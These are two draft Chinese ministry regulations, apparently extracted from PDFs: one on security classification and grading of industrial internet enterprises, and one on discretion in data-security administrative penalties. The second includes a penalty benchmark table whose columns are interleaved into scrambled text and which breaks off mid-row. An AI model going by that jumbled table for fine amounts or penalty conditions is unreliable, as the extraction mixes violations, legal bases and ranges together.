附件 (公开征求意见稿) 第一章 总 则 第一条 【目的依据】为加强工业互联网安全分类分级 管理,落实企业网络安全主体责任,提升工业互联网安全防 护水平,促进工业互联网深度融合应用,护航新型工业化高 质量发展,维护国家安全和发展利益,根据《中华人民共和 国网络安全法》《中华人民共和国数据安全法》等法律法规 及国家有关规定,制定本办法。 第二条 【适用范围】在中华人民共和国境内开展工业 互联网安全分类分级管理工作的,应当遵守相关法律、行政 法规和本办法的要求。 第三条 【职责分工】工业和信息化部统筹指导开展工 业互联网安全分类分级管理工作,主要涉及原材料工业、装 备工业、消费品工业和电子信息制造业等主管行业领域。 各省、自治区、直辖市及计划单列市、新疆生产建设兵 团工业和信息化主管部门(以下简称地方工业和信息化主管 部门),各省、自治区、直辖市及计划单列市通信管理局(以 下简称地方通信管理局)开展本行政区域内工业互联网安全 1 分类分级管理。地方工业和信息化主管部门主要负责指导本 行政区域内联网工业企业的安全分类分级管理,同步加强工 业控制系统网络安全防护。地方通信管理局主要负责开展本 行政区域内平台企业、标识解析企业的安全分类分级管理, 并在公共互联网上对联网设备、系统等进行安全监测。 地方工业和信息化主管部门、地方通信管理局统称地方 主管部门。 第四条 【工作原则】工业互联网安全分类分级管理工 作遵循统筹指导、分类施策、分级防护、突出重点的原则, 指导企业提升安全防护能力。 第二章 企业分类分级 第五条 【企业分类】工业互联网安全分类分级管理以 工业互联网企业为对象,企业类型主要包括以下三类: (一)应用工业互联网的工业企业(以下简称联网工业 企业),主要是指将新一代信息通信技术与工业系统深度融 合,推动开展数字化研发、智能化制造、网络化协同、个性 化定制、服务化延伸等的工业企业; (二)工业互联网平台企业(以下简称平台企业),主 要是指面向制造业数字化、网络化、智能化需求,基于云平 台等方式对外提供工业大数据、工业 APP 等资源和公共服务 的企业; (三)工业互联网标识解析企业(以下简称标识解析企 业),主要是指工业互联网标识解析根节点运行机构、国家 2 顶级节点运行机构、标识注册服务机构、递归节点运行机构 等提供工业互联网标识服务的机构。 第六条 【自主定级】工业互联网企业应当按照工业互 联网安全定级相关标准规范,结合企业规模、业务范围、应 用工业互联网的程度、运营重要系统的程度、掌握重要数据 的程度、对行业发展和产业链供应链安全的重要程度以及发 生网络安全事件的影响后果等要素,开展自主定级。工业互 联网企业级别由高到低分为三级、二级、一级。 当企业定级要素发生较大变化,可能影响企业定级结果 时,企业应当在发生变化的三个月内重新定级。同时具有联 网工业企业、平台企业、标识解析企业中两种及以上属性的 企业,应当按照不同类型分别定级。 第七条 【定级核查】完成自主定级的工业互联网企业 通过全国工业互联网安全分类分级管理平台(以下简称分类 分级管理平台)开展信息登记,登记内容包括但不限于企业 名称、企业类型、企业级别、联系方式、网络安全负责人等 相关情况。地方主管部门通过分类分级管理平台对企业提交 登记的材料,在三十个工作日内开展核查,对材料内容不齐 全、定级不准确的,应当通知企业在二十个工作日内予以补 正。 第八条 【分级防护】工业互联网企业应当按照联网工 业企业、平台企业、标识解析企业、数据等相关安全防护标 准规范,根据企业类型、自身级别落实相适应的安全要求, 3 采取管理、技术等措施,提升相关设备、控制、网络、平台、 数据等的安全防护能力。 第九条 【符合性评测】工业互联网企业应当按照工业 互联网安全评测相关标准规范,自行或委托第三方评测机构, 定期开展标准符合性评测,三级工业互联网企业每年至少开 展一次评测,二级工业互联网企业每两年至少开展一次评测。 一级工业互联网企业可参照二级企业相关要求开展评测。 第十条 【安全整改】工业互联网企业对不符合分类分 级防护相关标准规范要求的,应当及时制定整改计划,落实 整改措施。 第三章 网络安全管理 第十一条 【管理制度】工业和信息化部建立健全工业 互联网安全分类分级管理制度体系,组织制定评估评测、信 息通报、应急预案等相关制度,以及分类分级、安全管理、 安全服务等相关标准,建立完善安全检查、监测预警、应急 处置、成效评价等工作机制。 地方主管部门应当建立健全属地工业互联网安全分类 分级管理制度机制,将工业互联网安全纳入重点工作任务, 督促企业落实网络安全主体责任,强化重点企业指导管理, 定期向工业和信息化部报送工业互联网安全管理工作情况。 地方工业和信息化主管部门、通信管理局加强工作协同,共 同做好工业互联网安全工作。 4 工业互联网企业承担本企业网络安全主体责任,企业主 要负责人为本企业网络安全第一责任人,要建立健全企业内 部网络安全管理制度,积极将网络安全纳入企业发展规划和 工作考核,加大网络安全投入,加强网络安全防护能力建设, 有效防范化解网络安全风险。企业应当配合工业和信息化部、 地方主管部门的监督管理。 第十二条 【监测预警和信息通报】工业和信息化部建 立健全工业互联网安全监测预警和信息通报机制,建设国家 级安全态势感知与风险预警手段,组织开展安全风险监测、 预警和通报,加强威胁信息共享。 地方主管部门建立属地工业互联网安全监测预警机制, 建设地方工业互联网安全技术平台,组织开展本行政区域内 安全风险监测,及时向相关企业通报安全风险隐患,指导企 业及时整改。 工业互联网企业应当根据自身级别,建设网络安全风险 监测手段,有效发现网络安全风险隐患并及时处置。三级工 业互联网企业按照有关标准,加强企业平台与国家、地方平 台之间的协同联动。 第十三条 【应急处置和演练】工业和信息化部建立健 全工业互联网安全应急处置制度机制,组织协调工业互联网 重大及以上网络安全事件应急处置,开展工业互联网安全演 练。 5 地方主管部门建立属地工业互联网安全应急处置制度, 组织开展工业互联网安全演练,做好本行政区域内工业互联 网安全事件应急处置工作,发现重大及以上安全事件,及时 上报工业和信息化部。 工业互联网企业应当制定网络安全事件应急预案,定期 开展安全演练,检验安全防护和应急处置能力。企业在网络 安全事件发生后,立即启动应急预案,采取相应补救措施。 发生一般及以上安全事件的,应当立即向地方主管部门报告。 第十四条 【检查评估】工业和信息化部建立健全工业 互联网安全检查评估机制,定期组织开展对工业互联网企业 的安全检查评估。 地方工业和信息化主管部门开展本行政区域内联网工 业企业的安全评估,地方通信管理局开展本行政区域内平台 企业、标识解析企业的安全检查,对发现的网络安全风险隐 患,指导企业加强安全整改。地方主管部门每年面向三级工 业互联网企业开展安全检查评估,定期面向二级、一级工业 互联网企业开展安全检查评估。 工业互联网企业应当配合工业和信息化部、地方主管部 门的网络安全检查评估。 第四章 支持与保障 第十五条 【地方保障】地方主管部门要加大人员投入 和经费支持力度,加强工业互联网安全工作相关考核激励, 建设工业互联网安全资源池,壮大属地安全支撑服务力量。 6 第十六条 【宣贯培训】地方主管部门要加强工业互联 网安全政策标准宣贯,充分利用大会、论坛等方式,提升工 业互联网安全意识和能力。加强工业互联网安全人才培养力 度,鼓励行业企业、联盟协会、研究机构等开展工业互联网 安全人才培训和岗位能力评价,支持举办工业互联网安全相 关赛事活动。 第十七条 【安全服务】工业和信息化部鼓励、支持具 备相关专业能力的第三方机构、网络安全企业等依据相关标 准,开展工业互联网安全检测评估、安全咨询、安全运维、 人员培训等安全服务,推动工业互联网安全服务认证,规范 安全服务要求,提高安全服务质量。 第十八条 【关键设备】工业和信息化部指导联网工业 企业识别重要工业控制系统,推动将分布式控制系统(DCS) 等纳入网络关键设备目录,支持开展工业控制系统和设备安 全检测。 第十九条 【技术应用】工业和信息化部支持地方主管 部门以及行业企业、研究机构、高等学校等,通过专项项目、 试点示范等方式,加大工业互联网安全技术研发和成果转化 应用,选树分类分级防护典型案例,推广工业互联网安全产 品和服务。 第五章 附则 第二十条 【法律责任】工业互联网企业违反本办法规 定,不履行网络和数据安全保护义务的,存在较大安全风险 7 或者发生安全事件的,工业和信息化部、地方主管部门可以 按照《中华人民共和国网络安全法》《中华人民共和国数据 安全法》等相关法律法规予以处理。 第二十一条 【施行日期】本办法自 2023 年 月 日起 施行。 8
standards
附件 1 工业和信息化领域数据安全行政处罚裁量指引(试行) (征求意见稿) 第一章 总 则 第一条 为规范工业和信息化领域数据安全监督管理部 门合法、适当地行使行政处罚自由裁量权,细化行政处罚裁 量基准,统一裁量尺度,根据《中华人民共和国行政处罚法》 《中华人民共和国数据安全法》《中华人民共和国网络安全 法》 《工业和信息化行政处罚程序规定》等法律、行政法规、 部门规章等有关规定,制定本指引。 第二条 在中华人民共和国境内开展的工业和信息化领 域数据安全违法行为行政处罚裁量工作,适用本指引。 本指引所称的行政处罚裁量权,是指工业、电信、无线 电行业监管部门在职责范围内对数据处理活动进行监管处 罚时,根据行政处罚原则,在法律、行政法规等规定的行政 处罚种类和幅度内,综合考量违法的事实、性质、手段、后 果、情节和合规措施等因素,正确、适当地确定行政处罚的 种类、幅度或者作出不予行政处罚决定的选择适用权限。 第三条 工业和信息化部负责组织制定修订工业和信息 化领域数据安全行政处罚裁量制度规范,指导、监督行业数 据安全行政处罚工作。 — 1 — 各省(自治区、直辖市)、市(自治州、地区)及计划 单列市、新疆生产建设兵团工业和信息化主管部门,各省(自 治区、直辖市)、市(自治州、地区)通信管理局和无线电 管理机构(以下统称地方行政处罚机关)按职责分工分别负 责本行政区域内工业、电信、无线电领域数据安全行政处罚 工作。 工业和信息化部及地方行政处罚机关统称为行政处罚 机关。 第四条 工业和信息化领域数据安全行政处罚裁量工作 应当遵循以下原则: (一)依法行政原则。依据法定权限,符合法律、行政 法规等规定的裁量条件、处罚种类和幅度,遵守法定程序。 (二)责罚相当原则。以事实为依据,处罚的种类和幅 度与违法行为的事实、性质、情节、社会危害程度等相当。 (三)处罚与教育相结合原则。兼顾纠正违法行为和教 育当事人,引导当事人自觉守法。 第二章 管 辖 第五条 工业和信息化领域数据安全行政处罚由违法行 为发生地的行政处罚机关管辖。 数据安全违法行为发生地包括实施违法行为的住所地、 实际经营地、工商注册地(工商注册地与实际经营地不一致 的,应按实际经营地),网络接入地,取得电信和互联网信 — 2 — 息服务相关许可(备案)所在地,网站建立者、管理者、使 用者所在地,计算机等终端设备所在地,数据集中存储地、 交易地、出境活动所在地等。 第六条 两个及以上行政处罚机关对同一违法行为均有 管辖权的,应当由最先立案的行政处罚机关管辖。 两个及以上的行政处罚机关对管辖权有争议的,应当在 发生争议之日起 7 日内协商解决,协商不成的,应当在 7 日 内报请共同的上一级行政处罚机关指定管辖;也可以直接由 共同的上一级行政处罚机关指定管辖。 第七条 工业和信息化部依职权指导监督工业和信息化 领域数据安全违法行为管辖工作。 存在下列情况之一的,可以由工业和信息化部指定管 辖: (一)数据安全违法行为情节严重的; (二)省级地方行政处罚机关对管辖发生争议,协商不 成的; (三)数据安全违法行为或主体涉及不同省级地区、不 同行业主管部门的; (四)法律、行政法规、部门规章等规定应当由工业和 信息化部指定管辖的其他情形。 第八条 行政处罚机关发现案件不属于其管辖的,应当 依法依规及时向有管辖权的行政处罚机关移送。 — 3 — 行政处罚机关发现违法行为涉嫌犯罪的,应当依法及时 将案件移送司法机关,不得以行政处罚代替刑事处罚。 第九条 对工业和信息化领域数据处理者的同一个数据 安全违法行为,不得给予两次以上罚款的行政处罚。 第三章 数据安全行政处罚情形 第十条 有以下情形之一的,属于不履行数据安全保护 义务: (一) 未定期梳理数据,按照相关标准规范识别重要数 据和核心数据并形成本单位具体目录; (二) 未建立数据全生命周期安全管理制度,未针对不 同级别数据明确数据收集、存储、使用、加工、传输、提供、 公开、销毁、转移、委托处理等环节的具体分级防护要求和 操作规程; (三) 未根据需要配备数据安全管理人员,统筹负责数 据处理活动的安全监督管理,协助行业(领域)监管部门开 展工作; (四) 未合理确定数据处理活动的操作权限,严格实施 人员权限管理; (五) 未根据应对数据安全事件的需要,制定应急预 案,并开展应急演练; (六) 未定期对从业人员开展数据安全教育和培训; (七) 未开展数据安全风险监测,及时排查安全隐患, — 4 — 采取必要的措施防范数据安全风险; (八) 发现可能造成较大及以上数据安全事件的风险 后,未按照风险信息报送与共享工作机制向所在地行业监管 部门报告并及时处置; (九) 数据安全事件发生后,未按照应急预案开展应急 处置; (十) 数据安全事件发生后,未按照规定向所在地行业 监管部门报告; (十一) 数据安全事件发生后,未按照规定及时告知 用户,并提供减轻危害措施; (十二) 未在数据全生命周期处理过程中,记录数据 处理、权限管理、人员操作等日志。日志留存时间少于六个 月; (十三) 工业和信息化领域重要数据和核心数据处理 者未建立覆盖本单位相关部门的数据安全工作体系,未明确 数据安全负责人和管理机构,未建立常态化沟通与协作机 制; (十四) 工业和信息化领域重要数据和核心数据处理 者未明确数据处理关键岗位和岗位职责,未要求关键岗位人 员签署数据安全责任书; (十五) 工业和信息化领域重要数据和核心数据处理 者未建立数据内部登记、审批等工作机制,未对重要数据和 — 5 — 核心数据的处理活动进行严格管理并留存记录; (十六) 工业和信息化领域重要数据和核心数据处理 者未按照有关规定做好重要数据和核心数据目录备案管理; (十七) 涉及重要数据和核心数据的安全事件,未第 一时间向所在地行业监管部门报告,事件处置完成后未在规 定期限内形成总结报告,每年未向本地区行业监管部门报告 数据安全事件处置情况; (十八) 工业和信息化领域重要数据和核心数据处理 者未按照规定对其数据处理活动每年至少开展一次风险评 估,及时整改风险问题,并向有关主管部门报送风险评估报 告; (十九) 工业和信息化领域重要数据和核心数据处理 者报送的风险评估报告未包括处理的重要数据的种类、数 量,开展数据处理活动的情况,面临的数据安全风险及其应 对措施等; (二十) 对于核心数据跨主体提供、转移、委托处理, 未按照有关规定进行评估、保护、报批等; (二十一) 其他不履行数据安全保护义务的。 第十一条 有以下情形之一的,属于向境外非法提供数 据: (一)工业和信息化领域中的关键信息基础设施运营 者在中华人民共和国境内运营中收集和产生的重要数据和 — 6 — 核心数据未在境内存储,或者因业务需要,确需向境外提供 的,未按照有关规定进行数据出境安全评估; (二)其他工业和信息化领域数据处理者,在中华人民 共和国境内收集和产生的重要数据和核心数据,未按照法 律、行政法规等要求在境内存储,或者确需向境外提供的, 未依法依规进行数据出境安全评估; (三)非经工业和信息化部批准,向外国工业、电信、 无线电执法机构提供存储于中华人民共和国境内的工业和 信息化领域数据; (四)其他向境外非法提供数据的。 第十二条 在各级行政处罚机关依法开展监督检查的过 程中,工业和信息化领域数据处理者存在以下情形之一的, 属于不配合监管: (一) 在有关行政处罚机关开展数据安全监督检查过 程中,未对组织运作、技术系统、算法原理、数据处理程序 等进行解释说明,未开放安全相关数据访问、提供必要技术 支持的; (二) 拒绝提供有关材料、信息的,或提供虚假材料、 信息的,或者隐匿、销毁、转移证据的; (三) 其他不履行配合数据安全监管义务的。 第十三条 符合下列情况之一的,为后果较轻情节: — 7 — (一)1000 万条以下一般数据被篡改、破坏、泄露或者 非法获取、非法利用; (二)对公民、法人和组织合法权益、社会公共利益造 成损害的持续时间较短,或直接经济损失在 1000 万元以内; (三)影响范围小,影响对象为单个或少数企业,且不 涉及跨地区的; (四)其他对行业发展、社会稳定和国家安全造成较轻 后果的。 第十四条 符合下列情况之一的,为后果较重情节: (一)超过 1000 万条一般数据被篡改、破坏、泄露或 者非法获取、非法利用,或者涉及重要数据、核心数据的; (二)对公民、法人和组织合法权益、社会公共利益造 成损害的持续时间较长,或直接经济损失超过 1000 万元且 在 5000 万元以内的; (三)影响范围较大,涉及多个企业,或涉及跨地区的; (四)其他对行业发展、社会稳定和国家安全造成较重 后果的。 第十五条 符合下列情况之一的,为后果严重情节: (一)超过 1 亿条一般数据被篡改、破坏、泄露或者非 法获取、非法利用,或者涉及 2 个以上数据处理者的重要数 据、核心数据的; — 8 — (二)对公民、法人和组织合法权益、社会公共利益造 成损害的持续时间长,或直接经济损失超过 5000 万元的; (三)影响范围涉及多个行业、地区的; (四)其他对行业发展、社会稳定和国家安全造成严重 后果的。 第四章 数据安全行政处罚裁量权适用规则 第十六条 工业和信息化领域数据安全行政处罚实施流 程按照《中华人民共和国行政处罚法》《工业和信息化行政 处罚程序规定》等法律法规的有关规定执行。 第十七条 本指引规定的数据安全行政处罚情形,各级 行政处罚机关应当依据《工业和信息化领域数据安全行政处 罚裁量基准》(附件)确定的行政处罚种类和幅度实施行政 处罚。 第十八条 有下列情形之一的,依法不予行政处罚: (一)违法行为轻微并及时改正,没有造成危害后果的; 初次违法且危害后果轻微并及时改正的可以不予处罚; (二)工业和信息化领域数据处理者有证据足以证明没 有主观过错的; (三)其他依法应当不予行政处罚的。 第十九条 有下列情形之一的,依法从轻或减轻行政处 罚: (一)主动消除或者减轻数据安全违法行为危害后果 — 9 — 的; (二)受胁迫或者诱骗实施数据安全违法行为的; (三)主动供述行业监管部门尚未掌握的数据安全违法 行为的; (四)积极配合行业监管部门查处数据安全违法行为 的; (五)法律、行政法规、部门规章等规定其他应当从轻 或者减轻行政处罚的。 第二十条 有下列情形之一的,依法从重行政处罚: (一)两年内因同类数据安全违法行为被处罚 3 次以上 的; (二)阻碍或者拒不配合行业监管部门查处数据安全违 法行为或者对行政执法人员打击报复的; (三)教唆、胁迫、诱骗他人实施数据安全违法行为的; (四)伪造、隐匿、毁灭证据的; (五)数据安全违法行为引起不良社会反响的; (六)其他具有从重情节的。 第二十一条 工业和信息化领域数据处理者既有从轻或 者减轻行政处罚情节,又有从重行政处罚情节的,行业监管 部门应当结合实际情况综合考虑后作出裁量决定。 第二十二条 不予行政处罚、减轻行政处罚、从轻行政 处罚和从重行政处罚的含义。 — 10 — 不予行政处罚是指因法定原因对特定违法行为不给予 行政处罚。 减轻行政处罚是指适用法定行政处罚最低限度以下的 处罚种类或处罚幅度。 从轻行政处罚是指在依法可选择的处罚种类和处罚幅 度内,适用较轻、较少的处罚种类或者较低的处罚幅度。其 中,罚款的数额应当为从最低限到不超过最高限 70%的这一 部分,且从轻处罚后的罚款数额不得低于法定最低罚款数 额。 从重行政处罚是指在依法可以选择的处罚种类和处罚 幅度内,适用较重、较多的处罚种类或者较高的处罚幅度。 其中,罚款数额应当从最低限的 2 倍到最高限这一部分。 第五章 附则 第二十三条 本指引所称“以上”“以下”“以内”均含本数。 第二十四条 国防科技工业、烟草领域数据安全行政处 罚裁量规定,另行制定。 第二十五条 本指引由工业和信息化部负责解释。 第二十六条 本指引自印发之日起施行。 附件:工业和信息化领域数据安全行政处罚裁量基准 — 11 — 附件 工业和信息化领域数据安全行政处罚裁量基准 序 违法行为 裁量情形 行政处罚依据 裁量阶次 具体标准 适用条件 号 《中华人民共和国数据安 数据安全管理制度建立落实 (二)未建立数据全生 不到位情节轻微,且能够及 命周期安全管理制度,全法》第二十七条 开展数据处 不予处罚 责令改正 理活动应当依照法律、法规的 时改正的,可以不予行政处 对工业和信 未针对不同级别数据 罚。 规定,建立健全全流程数据安 息化领域处 明确数据收集、存储、 全管理制度,组织开展数据安 责令改正,给予警告, 理者开展数 使用、加工、传输、提 全教育培训,采取相应的技术 可以并处五万元以下 数据安全管理制度建立落实 据处理活动 供、公开、销毁、转移、 措施和其他必要措施,保障数 罚款,对直接负责的 不到位情节较轻,且能够在 未依照法律、委托处理等环节的具 减轻处罚 1 据安全。利用互联网信息网络 主管人员和其他直接 规定期限内提前改正到位 法规的规定,体分级防护要求和操 开展数据处理活动,应当在网 责任人员处一万元以 的,予以减轻处罚。 建立健全全 作规程; 络安全等级保护制 度的基础 下罚款 流程数据安 (五)未根据应对数据 上,履行上述数据安全保护义 责令改正,给予警告,数据安全管理制度建立落实 全管理制度 安全事件的需要,制定 务。 可以并处五万元以上 不到位情节较轻,在规定期 的行政处罚 应急预案,并开展应急 第四十五条 开展数据处 从轻处罚 三 十 五 万 元 以 下 罚 限内采取积极有效措施,但 演练; 理活动的组织、个人不履行本 款,对直接负责的主 未完全改正到位、承诺继续 (十五)工业和信息化 法第二十七条、第二十九条、 管人员和其他直接责 加强改正的,予以从轻处罚。 — 12 — 序 违法行为 裁量情形 行政处罚依据 裁量阶次 具体标准 适用条件 号 领域重要数据和核心 第三十条规定的数据安全保护 任人员处一万元以上 数据处理者,未建立数 义务的,由有关主管部门责令 七万元以下罚款 据内部登记、审批等工 改正,给予警告,可以并处五 作机制,未对重要数据 万元以上五十万元以下罚款, 处十万元以上五十万 和核心数据的处理活 对直接负责的主管人员和其他 元以下罚款,对直接 数据安全管理制度建立落实 动进行严格管理并留 直接责任人员可以处一万元以 负责的主管人员和其 不到位情节较轻,在规定期 从重处罚 存记录 上十万元以下罚款。 他直接责任人员处两 限内改正不积极的,予以从 万元以上十万元以下 重处罚。 罚款 《中华人民共和国数据安 不予处罚 无 无 全法》第二十七条 开展数据处 理活动应当依照法律、法规的 减轻处罚 无 无 规定,建立健全全流程数据安 全管理制度,组织开展数据安 处五十万元以上一百 全教育培训,采取相应的技术 四十万元以下罚款, 措施和其他必要措施,保障数 并可以责令暂停相关 据安全。利用互联网信息网络 业务、停业整顿、吊 拒不改正,且数据安全管理 开展数据处理活动,应当在网 销相关业务许可证或 从轻处罚 制度建立落实不到位情节较 络安全等级保护制 度的基础 者吊销营业执照,对 轻的,予以从轻处罚。 上,履行上述数据安全保护义 直接负责的主管人员 务。 和其他直接责任人员 第四十五条 开展数据处 处五万元以上十四万 理活动的组织、个人不履行本 元以下罚款。 — 13 — 序 违法行为 裁量情形 行政处罚依据 裁量阶次 具体标准 适用条件 号 法第二十七条、第二十九条、 处一百万元以上二百 第三十条规定的数据安全保护 万元以下罚款,并责 义务的,且拒不改正或者造成 令暂停相关业务、停 大量数据泄露等严重后果的, 业整顿、吊销相关业 处五十万元以上二百万元以下 拒不改正,且数据安全管理 务许可证或者吊销营 罚款,并可以责令暂停相关业 从重处罚 制度建立落实不到位情节较 业执照,对直接负责 务、停业整顿、吊销相关业务 重的,予以从重处罚。 的主管人员和其他直 许可证或者吊销营业执照,对 接责任人员处十万元 直接负责的主管人员和其他直 以上二十万元以下罚 接责任人员处五万元以上二十 款。 万元以下罚款。 不予处罚 无 无 第四十五条 减轻处罚 无 无 违反国家核心数据管理制度, 从轻处罚 无 无 危害国家主权、安全和发展利 益的,由有关主管部门处二百 处四百万元以上一千 涉及 2 个以上数据处理者的 万元以上一千万元以下罚款, 万元以下罚款,并根 核心数据的,对公民、法人 并根据 情况责令 暂停相关 业 据情况责令暂停相关 和组织合法权益、社会公共 务、停业整顿、吊销相关业务 从重处罚 业务、停业整顿、吊 利 益 造 成 损 害 的 持 续 时 间 许可证或者吊销营业执照;构 销相关业务许可证或 长,影响范围涉及多个行业、 成犯罪的,依法追究刑事责任。 者吊销营业执照;构 地区的;对行业发展、社会 成犯罪的,依法追究 稳定和国家安全造成严重后 刑事责任。 果的。 — 14 — 序 违法行为 裁量情形 行政处罚依据 裁量阶次 具体标准 适用条件 号 数据安全教育培训落实不到 《中华人民共和国数据安 不予处罚 责令改正 位情节轻微,且能够及时改 全法》第二十七条 开展数据处 正的,可以不予行政处罚。 理活动应当依照法律、法规的 责令改正,给予警告, 规定,建立健全全流程数据安 可以并处五万元以下 数据安全教育培训落实不到 全管理制度,组织开展数据安 罚款,对直接负责的 位情节较轻,且能够在规定 减轻处罚 全教育培训,采取相应的技术 主管人员和其他直接 期限内提前改正到位的,予 对工业和信 措施和其他必要措施,保障数 责任人员处一万元以 以减轻处罚。 息化领域数 据安全。利用互联网信息网络 下罚款 据处理者开 开展数据处理活动,应当在网 展数据处理 络安全 等级保护制 度的基础 责令改正,给予警告, (六)未定期对从 可以并处五万元以上 数据安全教育培训落实不到 活动未依照 上,履行上述数据安全保护义 2 业人员开展数据安全 三 十 五 万 元 以 下 罚 位情节较轻,在规定期限内 法律、法规的 务。 教育和培训 规定,组织开 第四十五条 开展数据处 从轻处罚 款,对直接负责的主 采取积极有效措施,但未完 展数据安全 理活动的组织、个人不履行本 管人员和其他直接责 全改正到位、承诺继续加强 教育培训的 法第二十七条、第二十九条、 任人员处一万元以上 改正的,予以从轻处罚。 行政处罚 第三十条规定的数据安全保护 七万元以下罚款 义务的,由有关主管部门责令 改正,给予警告,可以并处五 处十万元以上五十万 万元以上五十万元以下罚款, 元以下罚款,对直接 数据安全教育培训落实不到 对直接负责的主管人员和其他 从重处罚 负责的主管人员和其 位情节较轻,在规定期限内 直接责任人员可以处一万元以 他直接责任人员处两 改正不积极的,予以从重处 上十万元以下罚款。 万元以上十万元以下 罚。 罚款 — 15 — 序 违法行为 裁量情形 行政处罚依据 裁量阶次 具体标准 适用条件 号 《中华人民共和国数据安 全法》第二十七条 开展数据处 不予处罚 无 无 理活动应当依照法律、法规的 规定,建立健全全流程数据安 全管理制度,组织开展数据安 全教育培训,采取相应的技术 减轻处罚 无 无 措施和其他必要措施,保障数 据安全。利用互联网信息网络 开展数据处理活动,应当在网 处五十万元以上一百 络安全 等级保护制 度的基础 四十万元以下罚款, 上,履行上述数据安全保护义 并可以责令暂停相关 务。 业务、停业整顿、吊 拒不改正,且数据安全教育 第四十五条 开展数据处 销相关业务许可证或 从轻处罚 培训落实不到位情节较轻 理活动的组织、个人不履行本 者吊销营业执照,对 的,予以从轻处罚。 法第二十七条、第二十九条、 直接负责的主管人员 第三十条规定的数据安全保护 和其他直接责任人员 义务的,且拒不改正或者造成 处五万元以上十四万 大量数据泄露等严重后果的, 元以下罚款。 处五十万元以上二百万元以下 处一百万元以上二百 罚款,并可以责令暂停相关业 万元以下罚款,并责 拒不改正,且数据安全教育 务、停业整顿、吊销相关业务 令暂停相关业务、停 从重处罚 培训落实不到位情节较重 许可证或者吊销营业执照,对 业整顿、吊销相关业 的,予以从重处罚。 直接负责的主管人员和其他直 务许可证或者吊销营 接责任人员处五万元以上二十 业执照,对直接负责 — 16 — 序 违法行为 裁量情形 行政处罚依据 裁量阶次 具体标准 适用条件 号 万元以下罚款。 的主管人员和其他直 接责任人员处十万元 以上二十万元以下罚 款。 (一)未定期梳理数 《中华人民共和国数据安 违法行为轻微并及时改正, 据,按照相关标准规范 全法》第二十七条 开展数据处 没有造成危害后果的,或者 识别重要数据和核心 理活动应当依照法律、法规的 违法行为当事人有证据足以 数据并形成本单位具 规定,建立健全全流程数据安 不予处罚 责令改正 证明没有主观过错的,不予 对工业和信 体目录; 全管理制度,组织开展数据安 行政处罚。初次违法且危害 息化领域数 全教育培训,采取相应的技术 后果轻微并及时改正的,可 (二)未 建 立 数 据 全 据处理者开 措施和其他必要措施,保障数 以不予行政处罚。 生命周期安全管理制 展数据处理 据安全。利用互联网信息网络 造成较轻后果,对公民、法 度,未针对不同级别数 活动未依照 开展数据处理活动,应当在网 责令改正,给予警告,人和组织合法权益、社会公 据明确数据收集、存 法律、法规的 络安全等级保护制 度的基础 可以并处五万元以下 共利益造成损害的时间较 3 储、使用、加工、传输、 规定,采取相 上,履行上述数据安全保护义 罚款,对直接负责的 短,影响范围较小,仅涉及 提供、公开、销毁、转 减轻处罚 应的技术措 务。 主管人员和其他直接 单个或少数企业,且主动消 移、委托处理等环节的 施和其他必 第四十五条 开展数据处 责任人员处一万元以 除或者减轻危害后果,在规 具体分级防护要求和 要措施,保障 理活动的组织、个人不履行本 下罚款 定期限内提前改正到位的, 操作规程; 数据安全的 法第二十七条、第二十九条、 予以减轻处罚。 行政处罚 (四)未合理确定数据 第三十条规定的数据安全保护 责令改正,给予警告,造成较轻后果,对公民、法 处理活动的操作权限,义务的,由有关主管部门责令 可以并处五万元以上 人和组织合法权益、社会公 严格实施人员权限管 改正,给予警告,可以并处五 从轻处罚 三 十 五 万 元 以 下 罚 共利益造成损害的时间较 理; 万元以上五十万元以下罚款, 款,对直接负责的主 短,影响范围较小,仅涉及 (十二)未在数据全生 对直接负责的主管人员和其他 管人员和其他直接责 单个或少数企业,在规定期 — 17 — 序 违法行为 裁量情形 行政处罚依据 裁量阶次 具体标准 适用条件 号 命周期处理过程中,记 直接责任人员可以处一万元以 任人员处一万元以上 限内采取积极有效措施,但 录数据处理、权限管 上十万元以下罚款。 七万元以下罚款 未完全改正到位、承诺继续 理、人员操作等日志。 加强改正的,予以从轻处罚。 日志留存时间少于六 处十万元以上五十万 造成严重后果,对公民、法 个月; 元以下罚款,对直接 人和组织合法权益、社会公 (十六)工业和信息化 负责的主管人员和其 共利益造成损害的时间长, 领域重要数据和核心 从重处罚 他直接责任人员处两 影响范围大,涉及多个企业 数据处理者,未按照有 万元以上十万元以下 或跨行业、跨地区的,予以 关规定做好重要数据 罚款 从重处罚。 和核心数据目录备案 管理; 《中华人民共和国数据安 不予处罚 无 无 (二十)对于核心数据 全法》第二十七条 开展数据处 减轻处罚 无 无 跨主体提供、转移、委 理活动应当依照法律、法规的 处五十万元以上一百 托处理,未按照有关规 规定,建立健全全流程数据安 四十万元以下罚款, 拒不改正或者造成大量数据 定进行评估、保护、报 全管理制度,组织开展数据安 并可以责令暂停相关 泄露等严重后果的,且对公 批等 全教育培训,采取相应的技术 业务、停业整顿、吊 民、法人和组织合法权益、 措施和其他必要措施,保障数 销相关业务许可证或 从轻处罚 社会公共利益造成损害的时 据安全。利用互联网信息网络 者吊销营业执照,对 间较短,影响范围较小,仅 开展数据处理活动,应当在网 直接负责的主管人员 涉及单个或少数企业的,予 络安全等级保护制 度的基础 和其他直接责任人员 以从轻处罚。 上,履行上述数据安全保护义 处五万元以上十四万 务。 元以下罚款。 — 18 — 序 违法行为 裁量情形 行政处罚依据 裁量阶次 具体标准 适用条件 号 第四十五条 开展数据处 理活动的组织、个人不履行本 处一百万元以上二百 法第二十七条、第二十九条、 万元以下罚款,并责 第三十条规定的数据安全保护 拒不改正或者造成大量数据 令暂停相关业务、停 义务的,且拒不改正或者造成 泄露等严重后果的,且对公 业整顿、吊销相关业 大量数据泄露等严重后果的, 民、法人和组织合法权益、 务许可证或者吊销营 处五十万元以上二百万元以下 从重处罚 社会公共利益造成损害的时 业执照,对直接负责 罚款,并可以责令暂停相关业 间长,影响范围大,涉及多 的主管人员和其他直 务、停业整顿、吊销相关业务 个企业或跨行业、跨地区的, 接责任人员处十万元 许可证或者吊销营业执照,对 予以从重处罚。 以上二十万元以下罚 直接负责的主管人员和其他直 款。 接责任人员处五万元以上二十 万元以下罚款。 不予处罚 无 无 第四十五条 减轻处罚 无 无 违反国家核心数据管理制度, 从轻处罚 无 无 危害国家主权、安全和发展利 处四百万元以上一千 涉及 2 个以上数据处理者的 益的,由有关主管部门处二百 万元以下罚款,并根 核心数据的,对公民、法人 万元以上一千万元以下罚款, 据情况责令暂停相关 和组织合法权益、社会公共 并根据 情况责令 暂停相关 业 业务、停业整顿、吊 利 益 造 成 损 害 的 持 续 时 间 从重处罚 